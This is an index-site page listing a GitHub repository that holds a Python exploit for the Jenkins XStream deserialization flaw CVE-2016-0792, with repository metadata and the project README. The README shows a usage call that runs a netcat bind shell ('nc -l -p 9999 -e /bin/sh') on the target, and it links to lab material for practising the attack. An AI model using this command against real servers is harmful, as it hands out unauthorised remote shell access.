Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/jpiechowka/jenkins-cve-2016-0792

Exploit for Jenkins serialization vulnerability - CVE-2016-0792
https://github.com/jpiechowka/jenkins-cve-2016-0792

cve cve-2016-0792 deserialization exploit jenkins-serialization-vulnerability python serialization vulnerability vulnerability-detection

Last synced: 22 days ago
JSON representation

Exploit for Jenkins serialization vulnerability - CVE-2016-0792

Host: GitHub
URL: https://github.com/jpiechowka/jenkins-cve-2016-0792
Owner: jpiechowka
License: mit
Created: 2017-07-30T18:39:24.000Z (over 7 years ago)
Default Branch: master
Last Pushed: 2017-08-02T23:51:34.000Z (over 7 years ago)
Last Synced: 2024-08-05T17:41:08.682Z (4 months ago)
Topics: cve, cve-2016-0792, deserialization, exploit, jenkins-serialization-vulnerability, python, serialization, vulnerability, vulnerability-detection
Language: Python
Size: 5.86 KB
Stars: 51
Watchers: 4
Forks: 21
Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

awesome-hacking-lists - jpiechowka/jenkins-cve-2016-0792 - Exploit for Jenkins serialization vulnerability - CVE-2016-0792 (Python)

README

# Jenkins CVE-2016-0792
## Exploit for Jenkins serialization vulnerability - CVE-2016-0792

#### Exploit database

[https://www.exploit-db.com/exploits/42394/](https://www.exploit-db.com/exploits/42394/)

#### More information can be found here

1. [Contrast Security](https://www.contrastsecurity.com/security-influencers/serialization-must-die-act-2-xstream)

2. [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)

#### Requirements

1. Python 3.6.x

2. [requests](http://docs.python-requests.org/en/master/) library is required for this exploit to work

`sudo pip install requests`

#### Usage

`python3`

`from exploit import exploit`

`exploit(url, command)`

Where url is url to jenkins server and command is command to execute

##### Example

`exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')`

This will run nc and listen on port 9999 on vulnerable machine

For demonstration purposes I will be running ISO from [Pentester Lab](https://www.pentesterlab.com/exercises/cve-2016-0792/)

[![asciicast](https://asciinema.org/a/131436.png)](https://asciinema.org/a/131436)

#### Disclaimer
Using this software to attack targets without permission is illegal. I am not responsible for any damage caused by using
this software against the law.